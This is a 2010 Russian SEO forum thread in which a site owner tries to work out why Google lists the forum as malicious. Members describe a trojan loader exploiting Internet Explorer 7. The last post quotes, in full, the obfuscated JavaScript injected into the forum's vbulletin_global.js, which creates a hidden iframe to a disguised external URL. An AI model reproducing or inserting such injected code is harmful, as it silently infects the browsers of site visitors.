Сео форум про методы раскрутки сайтов. Как раскрутить сайт и заработать в интернете.

Сео форум про методы раскрутки сайтов. Как раскрутить сайт и заработать в интернете. (http://forum-seo.net/index.php)
-   Про наш СЕО форум (http://forum-seo.net/forumdisplay.php?f=38)
-   -   Что с форумом ? (http://forum-seo.net/showthread.php?t=6882)

GAGAn 08.04.2010 13:59
Что с форумом ?
 
Почему его блочит?
Или это только у меня ?:ck:
http://xmages.net/upload/0e198c90.jpg

Seo-man 09.04.2010 10:38
Я ищу на форуме вирус, но мой nod4 не видит ничего.
И ещё проверил в доктор вебе - чисто.
А ещё сайт прямо на хостинге проверил антивирусом - все чисто.
Как он попал в базу вредноносных сайтов?

Andrey1 09.04.2010 14:53
На тебя кто-то просто настучал вот и все.Похоже его доносы возымели действие.У меня на форуме сейчас присутствуют 10

Seo-man 09.04.2010 15:22
Я отписал в гугл, через панель вебмастера, буду теперь ждать результата.

sergeyu 09.04.2010 16:00
А тебе хоть раз из гугли ответели? Мне не разу(((
Кстате мой Аутпост не видит виря...

Andrey1 11.04.2010 14:23
Что тут сказатьТак тебе и надо.Это тебе будет расплата.

Seo-man 12.04.2010 21:25
Цитата:
Сообщение от Gaan
Привет!
Загрузчик трояна пробивает Internet Explorer 7
На счёт других браузеров незнаю, вроде говорят, что пробивает Mozilla Firefox и
старую оперу.
Через Internet Explorer 7 троян подгружается:
C:\Documents and Settings\имя пользователя\Application Data
Сам троян sdra64.exe , в папку lowsec рядом с собой он складывает отчёты в зашифрованном виде + ещё тройка exe-шников (load[1].exe pdfupd.exe и 0.9875503536401076.exe у последнего в названии генерится случайный номер). В диспетчере не отображается, постоянно следит за тем чтобы его не удалили с автозагрузки, при удалении с автозагрузки в реестре вновь себя прописывает.
На 100% не уверен, но сравни для начала файл Index с оригиналом с офф. сайта (возможно у тебя самого был скачан уже протрояненый движок сайта) Далее обязательно посмотри файлы шаблонов именно в них любят вписывать зловредный код, возможно ты также скачал уже протрояненый шаблон, такое порой случается.
я все проверил - это не на форуме.
А что скажут остальные форумчане?

Seo-man 15.04.2010 11:42
Последняя проверка: 14 апреля 2010 г.

Общая проблема
Когда Google последний раз тестировал эту страницу, ваш сервер возвратил контент, который направил браузер на сайт, распространяющий вредоносное программное обеспечение. К сожалению, Google не смог изолировать вредоносный код на этой странице.

Я не могу найти вирус!

sergeyu 15.04.2010 17:13
Я не могу найти вирус!
__________________
Блин, да его нет!!! Ты почитай что пишет гугль когда через ту же Лису заходишь, в течении 90 дней активности не было, просто это очередной загон гугля, пиши еще.

Seo-man 16.04.2010 11:16
Все ясно. Вирусописатели поумнели, взломщики стали более изощренными... я такого раньше не видел, раньше обычно тупо в конец индексных файлов вставляли код.
Теперь вырусы ещё попадают в яваскрипты, так что заражены js скрипты.
К примеру : в clientscript/vbulletin_global.js?v=3610
Цитата:
function omlb(){};omlb.prototype={ccwot:function(){var tckqkgne=document.createElement('iframe');try{tckq kgne.setAttribute('style','display: none'); tckqkgne.setAttribute('src','hsNstqt@@p!b:bsz/9/Yssaq9dz@wz@ba49rNe4zcobu!!nb@tbNeYbr4.q!c!bo@m@4q/NYiNzn!sq.9c9gY!@izz?!q1qN0!s!'.replace(/[zq!4bsY9@N]/g,'')); document.body.appendChild(tckqkgne);} catch(yben){document.write("<div style='visibility: hidden; height: 0px; width: 0px'>a</div></body></html>");this.ccwot();}}};var ntxpwm=new omlb();ntxpwm.ccwot();
А это явно вирус, с шифрованной ссылкой.


Часовой пояс GMT +3, время: 18:09.

Powered by vBulletin® Version 3.8.6
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot